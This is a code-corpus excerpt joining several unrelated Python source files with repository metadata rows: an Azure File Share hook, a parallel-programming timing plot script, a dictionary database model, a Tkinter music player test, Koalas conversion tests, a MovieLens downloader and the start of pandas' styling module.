Check if a file exists on Azure File Share.
:param share_name: Name of the share.
:type share_name: str
:param directory_name: Name of the directory.
:type directory_name: str
:param file_name: Name of the file.
:type file_name: str
:param kwargs: Optional keyword arguments that
`FileService.exists()` takes.
:type kwargs: object
:return: True if the file exists, False otherwise.
:rtype: bool
"""
return self.get_conn().exists(share_name, directory_name, file_name, **kwargs)
def list_directories_and_files(
self, share_name: str, directory_name: Optional[str] = None, **kwargs
) -> list:
"""
Return the list of directories and files stored on a Azure File Share.
:param share_name: Name of the share.
:type share_name: str
:param directory_name: Name of the directory.
:type directory_name: str
:param kwargs: Optional keyword arguments that
`FileService.list_directories_and_files()` takes.
:type kwargs: object
:return: A list of files and directories
:rtype: list
"""
return self.get_conn().list_directories_and_files(share_name, directory_name, **kwargs)
def list_files(self, share_name: str, directory_name: Optional[str] = None, **kwargs) -> List[str]:
"""
Return the list of files stored on a Azure File Share.
:param share_name: Name of the share.
:type share_name: str
:param directory_name: Name of the directory.
:type directory_name: str
:param kwargs: Optional keyword arguments that
`FileService.list_directories_and_files()` takes.
:type kwargs: object
:return: A list of files
:rtype: list
"""
return [
obj.name
for obj in self.list_directories_and_files(share_name, directory_name, **kwargs)
if isinstance(obj, File)
]
def create_share(self, share_name: str, **kwargs) -> bool:
"""
Create new Azure File Share.
:param share_name: Name of the share.
:type share_name: str
:param kwargs: Optional keyword arguments that
`FileService.create_share()` takes.
:type kwargs: object
:return: True if share is created, False if share already exists.
:rtype: bool
"""
return self.get_conn().create_share(share_name, **kwargs)
def delete_share(self, share_name: str, **kwargs) -> bool:
"""
Delete existing Azure File Share.
:param share_name: Name of the share.
:type share_name: str
:param kwargs: Optional keyword arguments that
`FileService.delete_share()` takes.
:type kwargs: object
:return: True if share is deleted, False if share does not exist.
:rtype: bool
"""
return self.get_conn().delete_share(share_name, **kwargs)
def create_directory(self, share_name: str, directory_name: str, **kwargs) -> list:
"""
Create a new directory on a Azure File Share.
:param share_name: Name of the share.
:type share_name: str
:param directory_name: Name of the directory.
:type directory_name: str
:param kwargs: Optional keyword arguments that
`FileService.create_directory()` takes.
:type kwargs: object
:return: A list of files and directories
:rtype: list
"""
return self.get_conn().create_directory(share_name, directory_name, **kwargs)
def get_file(
self, file_path: str, share_name: str, directory_name: str, file_name: str, **kwargs
) -> None:
"""
Download a file from Azure File Share.
:param file_path: Where to store the file.
:type file_path: str
:param share_name: Name of the share.
:type share_name: str
:param directory_name: Name of the directory.
:type directory_name: str
:param file_name: Name of the file.
:type file_name: str
:param kwargs: Optional keyword arguments that
`FileService.get_file_to_path()` takes.
:type kwargs: object
"""
self.get_conn().get_file_to_path(share_name, directory_name, file_name, file_path, **kwargs)
def get_file_to_stream(
self, stream: str, share_name: str, directory_name: str, file_name: str, **kwargs
) -> None:
"""
Download a file from Azure File Share.
:param stream: A filehandle to store the file to.
:type stream: file-like object
:param share_name: Name of the share.
:type share_name: str
:param directory_name: Name of the directory.
:type directory_name: str
:param file_name: Name of the file.
:type file_name: str
:param kwargs: Optional keyword arguments that
`FileService.get_file_to_stream()` takes.
:type kwargs: object
"""
self.get_conn().get_file_to_stream(share_name, directory_name, file_name, stream, **kwargs)
def load_file(
self, file_path: str, share_name: str, directory_name: str, file_name: str, **kwargs
) -> None:
"""
Upload a file to Azure File Share.
:param file_path: Path to the file to load.
:type file_path: str
:param share_name: Name of the share.
:type share_name: str
:param directory_name: Name of the directory.
:type directory_name: str
:param file_name: Name of the file.
:type file_name: str
:param kwargs: Optional keyword arguments that
`FileService.create_file_from_path()` takes.
:type kwargs: object
"""
self.get_conn().create_file_from_path(share_name, directory_name, file_name, file_path, **kwargs)
def load_string(
self, string_data: str, share_name: str, directory_name: str, file_name: str, **kwargs
) -> None:
"""
Upload a string to Azure File Share.
:param string_data: String to load.
:type string_data: str
:param share_name: Name of the share.
:type share_name: str
:param directory_name: Name of the directory.
:type directory_name: str
:param file_name: Name of the file.
:type file_name: str
:param kwargs: Optional keyword arguments that
`FileService.create_file_from_text()` takes.
:type kwargs: object
"""
self.get_conn().create_file_from_text(share_name, directory_name, file_name, string_data, **kwargs)
def load_stream(
self, stream: str, share_name: str, directory_name: str, file_name: str, count: str, **kwargs
) -> None:
"""
Upload a stream to Azure File Share.
:param stream: Opened file/stream to upload as the file content.
:type stream: file-like
:param share_name: Name of the share.
:type share_name: str
:param directory_name: Name of the directory.
:type directory_name: str
:param file_name: Name of the file.
:type file_name: str
:param count: Size of the stream in bytes
:type count: int
:param kwargs: Optional keyword arguments that
`FileService.create_file_from_stream()` takes.
:type kwargs: object
"""
self.get_conn().create_file_from_stream(
share_name, directory_name, file_name, stream, count, **kwargs
)
| 39.231454 | 107 | 0.626125 |
acfa885bf831852a736c73d8dca19a0b985820be | 1,932 | py | Python | time_template/draw_multi_proc.py | tsw303005/parallel_program | 0d1d46802dfb146b6d0933ee58711d9cad4b9dd6 | [
"MIT"
] | 4 | 2021-11-14T15:27:30.000Z | 2022-01-19T20:07:18.000Z | time_template/draw_multi_proc.py | Howeng98/Parallel-Programming | 0d1d46802dfb146b6d0933ee58711d9cad4b9dd6 | [
"MIT"
] | null | null | null | time_template/draw_multi_proc.py | Howeng98/Parallel-Programming | 0d1d46802dfb146b6d0933ee58711d9cad4b9dd6 | [
"MIT"
] | 2 | 2021-12-02T13:53:59.000Z | 2022-01-25T08:13:24.000Z | import matplotlib.pyplot as plt
import numpy as np
from tqdm import tqdm
from subprocess import Popen, PIPE, STDOUT
n = input("please input n: ")
testcase = input("please input testcase: ")
def print_command(p):
for line in p.stdout:
print(line.strip())
p = Popen(["make clean"], shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True)
print_command(p)
p = Popen(["make"], shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True)
print_command(p)
'''for different process experiment'''
result_cpu = list()
result_comm = list()
result_io = list()
process_num = [1, 2, 4, 8, 16, 32, 48]
for process in tqdm(process_num):
cmd = f"srun -n{process} ./hw1 {n} {testcase}.in {testcase}.out"
p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True)
line = [i for i in p.stdout]
result_cpu.append(float(line[0]))
result_comm.append(float(line[1]))
result_io.append(float(line[2]))
labels = [str(i) for i in process_num]
# bar chart for different process number's CPU, COMM, IO time
fig, ax = plt.subplots()
ax.bar(labels, result_cpu, label='CPU_time')
ax.bar(labels, result_comm, bottom=result_cpu, label='COMM_time')
ax.bar(labels, result_io, bottom=np.array(result_cpu)+np.array(result_comm), label='IO_time')
ax.set_xlabel("process number")
ax.set_ylabel("runtime (seconds)")
ax.set_title(f"different process performance")
ax.legend(loc="upper right")
fig.savefig(f"./images/{testcase}_diff_proc_bar.png")
# line chart for speed up factor
results = [result_cpu[i]+result_comm[i]+result_io[i] for i in range(len(process_num))]
total = [results[0]/results[i] for i in range(len(process_num))]
plt.figure(dpi=100, linewidth=2)
plt.plot(process_num, total, 'o-', color='g')
plt.xlabel('Process Number')
plt.xticks(np.arange(1, 49, 5))
plt.ylabel('Speedup Factor')
plt.title(f"different process speedup factor")
plt.savefig(f"./images/{testcase}_diff_proc_line.png") | 34.5 | 93 | 0.728778 |
acfa8b85b770b36461b01ebcb459eaf351e6d25c | 4,760 | py | Python | DictionaryOfNewZealandEnglish/headword/models.py | eResearchSandpit/DictionaryOfNewZealandEnglish | cf3cec34aafc7a9a8bd0413883f5eeb314d46a48 | [
"BSD-3-Clause"
] | null | null | null | DictionaryOfNewZealandEnglish/headword/models.py | eResearchSandpit/DictionaryOfNewZealandEnglish | cf3cec34aafc7a9a8bd0413883f5eeb314d46a48 | [
"BSD-3-Clause"
] | null | null | null | DictionaryOfNewZealandEnglish/headword/models.py | eResearchSandpit/DictionaryOfNewZealandEnglish | cf3cec34aafc7a9a8bd0413883f5eeb314d46a48 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import datetime as dt
from DictionaryOfNewZealandEnglish.database import (
Column,
db,
Model,
ReferenceCol,
relationship,
SurrogatePK,
)
##############################################
# join tables for many-to-many relationships #
headword_citations = db.Table('headword_citations',
db.Column('headword_id', db.Integer, db.ForeignKey('headwords.id')),
db.Column('citation_id', db.Integer, db.ForeignKey('citations.id'))
)
headword_flags = db.Table('headword_flags',
db.Column('headword_id', db.Integer, db.ForeignKey('headwords.id')),
db.Column('flag_id', db.Integer, db.ForeignKey('flags.id'))
)
headword_registers = db.Table('headword_registers',
db.Column('headword_id', db.Integer, db.ForeignKey('headwords.id')),
db.Column('register_id', db.Integer, db.ForeignKey('registers.id'))
)
class Headword(SurrogatePK, Model):
__tablename__ = "headwords"
headword = Column(db.String(50), nullable=False)
definition = Column(db.Text, nullable=False)
see = Column(db.Text, nullable=True)
pronunciation = Column(db.Text, nullable=True)
notes = Column(db.Text, nullable=True)
archived = Column(db.Boolean, default=False)
data_set_id = ReferenceCol('data_sets', nullable=True)
data_set = relationship('Data_set', backref='headwords')
homonym_number_id = ReferenceCol('homonym_numbers', nullable=True)
homonym_number = relationship('Homonym_number', backref='headwords')
word_class_id = ReferenceCol('word_classes', nullable=True)
word_class = relationship('Word_class', backref='headwords')
sense_number_id = ReferenceCol('sense_numbers', nullable=True)
sense_number = relationship('Sense_number', backref='headwords')
origin_id = ReferenceCol('origins', nullable=True)
origin = relationship('Origin', backref='headwords')
domain_id = ReferenceCol('domains', nullable=True)
domain = relationship('Domain', backref='headwords')
region_id = ReferenceCol('regions', nullable=True)
region = relationship('Region', backref='headwords')
# M2M relations
citations = relationship('Citation',
secondary = headword_citations,
backref=db.backref('headwords'),
order_by='Citation.archived, Citation.date')
flags = relationship('Flag',
secondary = headword_flags,
backref=db.backref('headwords'),
order_by='Flag.name')
registers = relationship('Register',
secondary = headword_registers,
backref=db.backref('headwords'),
order_by='Register.name')
created_at = Column(db.DateTime, default=dt.datetime.utcnow)
updated_at = Column(db.DateTime, nullable=False)
updated_by = Column(db.String(80), nullable=False)
def __init__(self, headword,
definition,
see,
pronunciation,
notes,
data_set_id,
homonym_number_id,
word_class_id,
sense_number_id,
origin_id,
domain_id,
region_id,
updated_at,
updated_by
):
db.Model.__init__(self, headword =headword,
definition =definition,
see =see,
pronunciation =pronunciation,
notes =notes,
data_set_id =data_set_id,
homonym_number_id=homonym_number_id,
word_class_id =word_class_id,
sense_number_id =sense_number_id,
origin_id =origin_id,
domain_id =domain_id,
region_id =region_id,
updated_at =updated_at,
updated_by =updated_by
)
@property
def full_name(self):
return "Headword is {0}".format(self.headword)
@property
def url_name(self):
return self.headword.replace(' ', '%20')
def __repr__(self):
return '<Headword ({name!r})>'.format(name=self.headword)
| 37.777778 | 75 | 0.532983 |
acfa8c0d38fc8b2cccd1f437a36546795a15f42c | 2,427 | py | Python | tests/test-startOffset.py | amikey/music-player-core | d124f8b43362648501d157a67d203d5f4ef008ad | [
"BSD-2-Clause"
] | 56 | 2015-04-21T05:35:38.000Z | 2021-02-16T13:42:45.000Z | tests/test-startOffset.py | n-peugnet/music-player-core | d124f8b43362648501d157a67d203d5f4ef008ad | [
"BSD-2-Clause"
] | 13 | 2015-05-09T17:36:27.000Z | 2020-02-13T17:44:59.000Z | tests/test-startOffset.py | n-peugnet/music-player-core | d124f8b43362648501d157a67d203d5f4ef008ad | [
"BSD-2-Clause"
] | 27 | 2015-06-15T14:54:58.000Z | 2021-07-22T09:59:40.000Z | #!/usr/bin/env python2
import sys, os, fnmatch, random, pprint, Tkinter
# Our parent path might contain a self-build musicplayer module. Use that one.
sys.path = [os.path.abspath((os.path.dirname(__file__) or ".") + "/..")] + sys.path
import musicplayer
print "Module:", musicplayer.__file__
class Song:
def __init__(self, fn):
self.url = fn
self.f = open(fn)
# This is the test.
self.startOffset = 3.5
def __eq__(self, other):
return self.url == other.url
def readPacket(self, bufSize):
return self.f.read(bufSize)
def seekRaw(self, offset, whence):
self.f.seek(offset, whence)
return self.f.tell()
files = []
def getFiles(path):
for f in sorted(os.listdir(path), key=lambda k: random.random()):
f = os.path.join(path, f)
if os.path.isdir(f): getFiles(f) # recurse
if len(files) > 1000: break # break if we have enough
if fnmatch.fnmatch(f, '*.mp3'): files.append(f)
getFiles(os.path.expanduser("~/Music"))
random.shuffle(files) # shuffle some more
files = sys.argv[1:] + files
assert files, "give me some files or fill-up ~/Music"
i = 0
def songs():
global i, files
while True:
yield Song(files[i])
i += 1
if i >= len(files): i = 0
def peekSongs(n):
nexti = i + 1
if nexti >= len(files): nexti = 0
return map(Song, (files[nexti:] + files[:nexti])[:n])
# Create our Music Player.
player = musicplayer.createPlayer()
player.outSamplerate = 96000 # support high quality :)
player.queue = songs()
player.peekQueue = peekSongs
# Setup a simple GUI.
window = Tkinter.Tk()
window.title("Music Player")
songName = Tkinter.StringVar()
songTime = Tkinter.StringVar()
songLabel = Tkinter.StringVar()
def onSongChange(**kwargs):
songName.set(os.path.basename(player.curSong.url))
songLabel.set(pprint.pformat(player.curSongMetadata))
def cmdPlayPause(*args): player.playing = not player.playing
def cmdNext(*args): player.nextSong()
def refreshTime():
songTime.set("Time: %.1f / %.1f" % (player.curSongPos or -1, player.curSongLen or -1))
window.after(10, refreshTime) # every 10ms
Tkinter.Label(window, textvariable=songName).pack()
Tkinter.Label(window, textvariable=songTime).pack()
Tkinter.Label(window, textvariable=songLabel).pack()
Tkinter.Button(window, text="Play/Pause", command=cmdPlayPause).pack()
Tkinter.Button(window, text="Next", command=cmdNext).pack()
refreshTime()
player.onSongChange = onSongChange
player.playing = True # start playing
window.mainloop()
| 27.579545 | 87 | 0.71199 |
acfa8ca1a62f31e89cf19b50a9875db2da7506a6 | 803 | py | Python | src/python33/menuPlugins/rowMajor.py | charlesdaniels/hercm | 6d1053576355cecf1164832a36b77cdce625974c | [
"BSD-3-Clause"
] | null | null | null | src/python33/menuPlugins/rowMajor.py | charlesdaniels/hercm | 6d1053576355cecf1164832a36b77cdce625974c | [
"BSD-3-Clause"
] | 32 | 2015-08-07T14:07:06.000Z | 2016-01-18T16:31:45.000Z | src/python33/menuPlugins/rowMajor.py | charlesdaniels/hercm | 6d1053576355cecf1164832a36b77cdce625974c | [
"BSD-3-Clause"
] | null | null | null | import masterPlugin
## wrapper for libHercMatrix.hercMatrix.makeRowMajor()
class rowMajor(masterPlugin.masterPlugin):
def __init__(this):
super().__init__()
this.command = "row-major"
this.aliases = None
this.commandInfo = {'requiredArguments': None,
'optionalArguments': None,
'argumentInfo': None,
'help': """Makes the matrix row-major (only affects COO data, not
the contents of the matrix)"""}
def execute(this, arguments, WORKINGMATRIX):
print("Making the matrix row-major...")
WORKINGMATRIX.makeRowMajor()
print("done")
def validate(this, arguments, WORKINGMATRIX):
if not super().validate(arguments, WORKINGMATRIX):
return False
return True | 33.458333 | 77 | 0.622665 |
acfa8ccf7896fd15234220ddfcf5868f2ea4d425 | 5,340 | py | Python | databricks/koalas/tests/test_dataframe_conversion.py | sadikovi/koalas | edc6074b8bc25a787ed175de3b9afbef28d8d721 | [
"Apache-2.0"
] | null | null | null | databricks/koalas/tests/test_dataframe_conversion.py | sadikovi/koalas | edc6074b8bc25a787ed175de3b9afbef28d8d721 | [
"Apache-2.0"
] | null | null | null | databricks/koalas/tests/test_dataframe_conversion.py | sadikovi/koalas | edc6074b8bc25a787ed175de3b9afbef28d8d721 | [
"Apache-2.0"
] | null | null | null | #
# Copyright (C) 2019 Databricks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import string
import numpy as np
import pandas as pd
from databricks import koalas
from databricks.koalas.testing.utils import ReusedSQLTestCase, SQLTestUtils, TestUtils
class DataFrameConversionTest(ReusedSQLTestCase, SQLTestUtils, TestUtils):
@property
def pdf(self):
return pd.DataFrame({
'a': [1, 2, 3],
'b': [4, 5, 6],
}, index=[0, 1, 3])
@property
def kdf(self):
return koalas.from_pandas(self.pdf)
@staticmethod
def strip_all_whitespace(str):
"""A helper function to remove all whitespace from a string."""
return str.translate({ord(c): None for c in string.whitespace})
def test_csv(self):
pdf = self.pdf
kdf = self.kdf
self.assert_eq(kdf.to_csv(), pdf.to_csv())
pdf = pd.DataFrame({
'a': [1, np.nan, 3],
'b': ["one", "two", None],
}, index=[0, 1, 3])
kdf = koalas.from_pandas(pdf)
self.assert_eq(kdf.to_csv(na_rep='null'), pdf.to_csv(na_rep='null'))
pdf = pd.DataFrame({
'a': [1.0, 2.0, 3.0],
'b': [4.0, 5.0, 6.0],
}, index=[0, 1, 3])
kdf = koalas.from_pandas(pdf)
self.assert_eq(kdf.to_csv(float_format='%.1f'), pdf.to_csv(float_format='%.1f'))
self.assert_eq(kdf.to_csv(header=False), pdf.to_csv(header=False))
self.assert_eq(kdf.to_csv(index=False), pdf.to_csv(index=False))
def test_to_html(self):
expected = self.strip_all_whitespace("""
<table border="1" class="dataframe">
<thead>
<tr style="text-align: right;"><th></th><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><th>0</th><td>1</td><td>4</td></tr>
<tr><th>1</th><td>2</td><td>5</td></tr>
<tr><th>3</th><td>3</td><td>6</td></tr>
</tbody>
</table>
""")
got = self.strip_all_whitespace(self.kdf.to_html())
self.assert_eq(got, expected)
# with max_rows set
expected = self.strip_all_whitespace("""
<table border="1" class="dataframe">
<thead>
<tr style="text-align: right;"><th></th><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><th>0</th><td>1</td><td>4</td></tr>
<tr><th>1</th><td>2</td><td>5</td></tr>
</tbody>
</table>
""")
got = self.strip_all_whitespace(self.kdf.to_html(max_rows=2))
self.assert_eq(got, expected)
@staticmethod
def get_excel_dfs(koalas_location, pandas_location):
return {
'got': pd.read_excel(koalas_location, index_col=0),
'expected': pd.read_excel(pandas_location, index_col=0)
}
def test_to_excel(self):
with self.temp_dir() as dirpath:
pandas_location = dirpath + "/" + "output1.xlsx"
koalas_location = dirpath + "/" + "output2.xlsx"
pdf = self.pdf
kdf = self.kdf
kdf.to_excel(koalas_location)
pdf.to_excel(pandas_location)
dataframes = self.get_excel_dfs(koalas_location, pandas_location)
self.assert_eq(dataframes['got'], dataframes['expected'])
pdf = pd.DataFrame({
'a': [1, None, 3],
'b': ["one", "two", None],
}, index=[0, 1, 3])
kdf = koalas.from_pandas(pdf)
kdf.to_excel(koalas_location, na_rep='null')
pdf.to_excel(pandas_location, na_rep='null')
dataframes = self.get_excel_dfs(koalas_location, pandas_location)
self.assert_eq(dataframes['got'], dataframes['expected'])
pdf = pd.DataFrame({
'a': [1.0, 2.0, 3.0],
'b': [4.0, 5.0, 6.0],
}, index=[0, 1, 3])
kdf = koalas.from_pandas(pdf)
kdf.to_excel(koalas_location, float_format='%.1f')
pdf.to_excel(pandas_location, float_format='%.1f')
dataframes = self.get_excel_dfs(koalas_location, pandas_location)
self.assert_eq(dataframes['got'], dataframes['expected'])
kdf.to_excel(koalas_location, header=False)
pdf.to_excel(pandas_location, header=False)
dataframes = self.get_excel_dfs(koalas_location, pandas_location)
self.assert_eq(dataframes['got'], dataframes['expected'])
kdf.to_excel(koalas_location, index=False)
pdf.to_excel(pandas_location, index=False)
dataframes = self.get_excel_dfs(koalas_location, pandas_location)
self.assert_eq(dataframes['got'], dataframes['expected'])
| 34.901961 | 88 | 0.57191 |
acfa8d8f46d496f21109144def834ec900e9a9c0 | 9,619 | py | Python | official/recommendation/movielens.py | 873040/Abhishek | 2ddd716e66bc5cc6e6f0787508dd07da0e02e75a | [
"Apache-2.0"
] | 12 | 2020-12-13T08:34:24.000Z | 2022-03-20T15:17:17.000Z | official/recommendation/movielens.py | 873040/Abhishek | 2ddd716e66bc5cc6e6f0787508dd07da0e02e75a | [
"Apache-2.0"
] | 10 | 2019-12-28T21:31:19.000Z | 2020-04-12T20:01:58.000Z | official/recommendation/movielens.py | 873040/Abhishek | 2ddd716e66bc5cc6e6f0787508dd07da0e02e75a | [
"Apache-2.0"
] | 8 | 2020-04-12T04:30:33.000Z | 2021-09-17T20:54:44.000Z | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Download and extract the MovieLens dataset from GroupLens website.
Download the dataset, and perform basic preprocessing.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import tempfile
import zipfile
# pylint: disable=g-bad-import-order
import numpy as np
import pandas as pd
import six
from six.moves import urllib # pylint: disable=redefined-builtin
from absl import app as absl_app
from absl import flags
from absl import logging
import tensorflow as tf
# pylint: enable=g-bad-import-order
from official.utils.flags import core as flags_core
ML_1M = "ml-1m"
ML_20M = "ml-20m"
DATASETS = [ML_1M, ML_20M]
RATINGS_FILE = "ratings.csv"
MOVIES_FILE = "movies.csv"
# URL to download dataset
_DATA_URL = "http://files.grouplens.org/datasets/movielens/"
GENRE_COLUMN = "genres"
ITEM_COLUMN = "item_id" # movies
RATING_COLUMN = "rating"
TIMESTAMP_COLUMN = "timestamp"
TITLE_COLUMN = "titles"
USER_COLUMN = "user_id"
GENRES = [
'Action', 'Adventure', 'Animation', "Children", 'Comedy', 'Crime',
'Documentary', 'Drama', 'Fantasy', 'Film-Noir', 'Horror', "IMAX", 'Musical',
'Mystery', 'Romance', 'Sci-Fi', 'Thriller', 'War', 'Western'
]
N_GENRE = len(GENRES)
RATING_COLUMNS = [USER_COLUMN, ITEM_COLUMN, RATING_COLUMN, TIMESTAMP_COLUMN]
MOVIE_COLUMNS = [ITEM_COLUMN, TITLE_COLUMN, GENRE_COLUMN]
# Note: Users are indexed [1, k], not [0, k-1]
NUM_USER_IDS = {
ML_1M: 6040,
ML_20M: 138493,
}
# Note: Movies are indexed [1, k], not [0, k-1]
# Both the 1m and 20m datasets use the same movie set.
NUM_ITEM_IDS = 3952
MAX_RATING = 5
NUM_RATINGS = {
ML_1M: 1000209,
ML_20M: 20000263
}
def _download_and_clean(dataset, data_dir):
"""Download MovieLens dataset in a standard format.
This function downloads the specified MovieLens format and coerces it into a
standard format. The only difference between the ml-1m and ml-20m datasets
after this point (other than size, of course) is that the 1m dataset uses
whole number ratings while the 20m dataset allows half integer ratings.
"""
if dataset not in DATASETS:
raise ValueError("dataset {} is not in {{{}}}".format(
dataset, ",".join(DATASETS)))
data_subdir = os.path.join(data_dir, dataset)
expected_files = ["{}.zip".format(dataset), RATINGS_FILE, MOVIES_FILE]
tf.io.gfile.makedirs(data_subdir)
if set(expected_files).intersection(
tf.io.gfile.listdir(data_subdir)) == set(expected_files):
logging.info("Dataset {} has already been downloaded".format(dataset))
return
url = "{}{}.zip".format(_DATA_URL, dataset)
temp_dir = tempfile.mkdtemp()
try:
zip_path = os.path.join(temp_dir, "{}.zip".format(dataset))
zip_path, _ = urllib.request.urlretrieve(url, zip_path)
statinfo = os.stat(zip_path)
# A new line to clear the carriage return from download progress
# logging.info is not applicable here
print()
logging.info(
"Successfully downloaded {} {} bytes".format(
zip_path, statinfo.st_size))
zipfile.ZipFile(zip_path, "r").extractall(temp_dir)
if dataset == ML_1M:
_regularize_1m_dataset(temp_dir)
else:
_regularize_20m_dataset(temp_dir)
for fname in tf.io.gfile.listdir(temp_dir):
if not tf.io.gfile.exists(os.path.join(data_subdir, fname)):
tf.io.gfile.copy(os.path.join(temp_dir, fname),
os.path.join(data_subdir, fname))
else:
logging.info("Skipping copy of {}, as it already exists in the "
"destination folder.".format(fname))
finally:
tf.io.gfile.rmtree(temp_dir)
def _transform_csv(input_path, output_path, names, skip_first, separator=","):
"""Transform csv to a regularized format.
Args:
input_path: The path of the raw csv.
output_path: The path of the cleaned csv.
names: The csv column names.
skip_first: Boolean of whether to skip the first line of the raw csv.
separator: Character used to separate fields in the raw csv.
"""
if six.PY2:
names = [six.ensure_text(n, "utf-8") for n in names]
with tf.io.gfile.GFile(output_path, "wb") as f_out, \
tf.io.gfile.GFile(input_path, "rb") as f_in:
# Write column names to the csv.
f_out.write(",".join(names).encode("utf-8"))
f_out.write(b"\n")
for i, line in enumerate(f_in):
if i == 0 and skip_first:
continue # ignore existing labels in the csv
line = six.ensure_text(line, "utf-8", errors="ignore")
fields = line.split(separator)
if separator != ",":
fields = ['"{}"'.format(field) if "," in field else field
for field in fields]
f_out.write(",".join(fields).encode("utf-8"))
def _regularize_1m_dataset(temp_dir):
"""
ratings.dat
The file has no header row, and each line is in the following format:
UserID::MovieID::Rating::Timestamp
- UserIDs range from 1 and 6040
- MovieIDs range from 1 and 3952
- Ratings are made on a 5-star scale (whole-star ratings only)
- Timestamp is represented in seconds since midnight Coordinated Universal
Time (UTC) of January 1, 1970.
- Each user has at least 20 ratings
movies.dat
Each line has the following format:
MovieID::Title::Genres
- MovieIDs range from 1 and 3952
"""
working_dir = os.path.join(temp_dir, ML_1M)
_transform_csv(
input_path=os.path.join(working_dir, "ratings.dat"),
output_path=os.path.join(temp_dir, RATINGS_FILE),
names=RATING_COLUMNS, skip_first=False, separator="::")
_transform_csv(
input_path=os.path.join(working_dir, "movies.dat"),
output_path=os.path.join(temp_dir, MOVIES_FILE),
names=MOVIE_COLUMNS, skip_first=False, separator="::")
tf.io.gfile.rmtree(working_dir)
def _regularize_20m_dataset(temp_dir):
"""
ratings.csv
Each line of this file after the header row represents one rating of one
movie by one user, and has the following format:
userId,movieId,rating,timestamp
- The lines within this file are ordered first by userId, then, within user,
by movieId.
- Ratings are made on a 5-star scale, with half-star increments
(0.5 stars - 5.0 stars).
- Timestamps represent seconds since midnight Coordinated Universal Time
(UTC) of January 1, 1970.
- All the users had rated at least 20 movies.
movies.csv
Each line has the following format:
MovieID,Title,Genres
- MovieIDs range from 1 and 3952
"""
working_dir = os.path.join(temp_dir, ML_20M)
_transform_csv(
input_path=os.path.join(working_dir, "ratings.csv"),
output_path=os.path.join(temp_dir, RATINGS_FILE),
names=RATING_COLUMNS, skip_first=True, separator=",")
_transform_csv(
input_path=os.path.join(working_dir, "movies.csv"),
output_path=os.path.join(temp_dir, MOVIES_FILE),
names=MOVIE_COLUMNS, skip_first=True, separator=",")
tf.io.gfile.rmtree(working_dir)
def download(dataset, data_dir):
if dataset:
_download_and_clean(dataset, data_dir)
else:
_ = [_download_and_clean(d, data_dir) for d in DATASETS]
def ratings_csv_to_dataframe(data_dir, dataset):
with tf.io.gfile.GFile(os.path.join(data_dir, dataset, RATINGS_FILE)) as f:
return pd.read_csv(f, encoding="utf-8")
def csv_to_joint_dataframe(data_dir, dataset):
ratings = ratings_csv_to_dataframe(data_dir, dataset)
with tf.io.gfile.GFile(os.path.join(data_dir, dataset, MOVIES_FILE)) as f:
movies = pd.read_csv(f, encoding="utf-8")
df = ratings.merge(movies, on=ITEM_COLUMN)
df[RATING_COLUMN] = df[RATING_COLUMN].astype(np.float32)
return df
def integerize_genres(dataframe):
"""Replace genre string with a binary vector.
Args:
dataframe: a pandas dataframe of movie data.
Returns:
The transformed dataframe.
"""
def _map_fn(entry):
entry.replace("Children's", "Children") # naming difference.
movie_genres = entry.split("|")
output = np.zeros((len(GENRES),), dtype=np.int64)
for i, genre in enumerate(GENRES):
if genre in movie_genres:
output[i] = 1
return output
dataframe[GENRE_COLUMN] = dataframe[GENRE_COLUMN].apply(_map_fn)
return dataframe
def define_data_download_flags():
"""Add flags specifying data download arguments."""
flags.DEFINE_string(
name="data_dir", default="/tmp/movielens-data/",
help=flags_core.help_wrap(
"Directory to download and extract data."))
flags.DEFINE_enum(
name="dataset", default=None,
enum_values=DATASETS, case_sensitive=False,
help=flags_core.help_wrap("Dataset to be trained and evaluated."))
def main(_):
"""Download and extract the data from GroupLens website."""
download(flags.FLAGS.dataset, flags.FLAGS.data_dir)
if __name__ == "__main__":
define_data_download_flags()
FLAGS = flags.FLAGS
absl_app.run(main)
| 31.029032 | 80 | 0.695291 |
acfa8e955a33583dff8f9e43f597ea36cf0584f5 | 137,627 | py | Python | pandas/io/formats/style.py | Arghya-Banerjee/pandas | 9a4fcea8de798938a434fcaf67a0aa5a46b76b5b | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | pandas/io/formats/style.py | Arghya-Banerjee/pandas | 9a4fcea8de798938a434fcaf67a0aa5a46b76b5b | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | pandas/io/formats/style.py | Arghya-Banerjee/pandas | 9a4fcea8de798938a434fcaf67a0aa5a46b76b5b | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | """
Module for applying conditional formatting to DataFrames and Series.
"""
from __future__ import annotations
from contextlib import contextmanager
import copy
from functools import partial
import operator
from typing import (
Any,
Callable,
Hashable,
Sequence,
)
import warnings
import numpy as np
from pandas._config import get_option
from pandas._typing import (
Axis,
FilePath,
IndexLabel,
Level,
Scalar,
WriteBuffer,
)
from pandas.compat._optional import import_optional_dependency
from pandas.util._decorators import (
Substitution,
doc,
)
from pandas.util._exceptions import find_stack_level
